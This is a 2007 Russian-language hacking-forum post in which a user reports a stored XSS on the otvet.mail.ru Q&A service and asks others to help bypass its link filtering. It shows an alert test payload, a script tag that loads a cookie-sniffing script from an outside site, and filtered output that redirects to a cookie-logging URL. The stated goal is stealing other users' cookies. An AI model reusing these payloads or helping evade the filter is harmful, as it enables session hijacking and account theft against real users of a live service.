Активная XSS на otvet.mail.ru!!!

Активная XSS на otvet.mail.ru!!!

11.01.2007, 11:42

DesignerMix

Познающий

Регистрация: 10.01.2007

Сообщений: 35

С нами: 10175402

Репутация: 34

Активная XSS на otvet.mail.ru!!!

Народ!!! Я нашёл XSS на otvet.mail.ru, но для её правильной работы ваша помошь нужна. Вот в чём вся суть, когда в вопрос (ответ) на этом сервисе вставляеш

Код:

%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

то это работает, но как только я хочу спереть чужие плюшки, то мэил фильтрует ссылку на сайт на котором стоит снифак. И как только я её (ссылку) не мучал, и переводил в разные кодировки и делал свой снифе вставлял код в ответ

Код:

<scriptsrc="http://www.naxodka.net/cookie.js"></script>

. Всё равно фильтрует гад, вот результат фильтрации

Код:

<script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>

. По моему эта тема интерестна всем, так давайте её раскрутим, а?!!!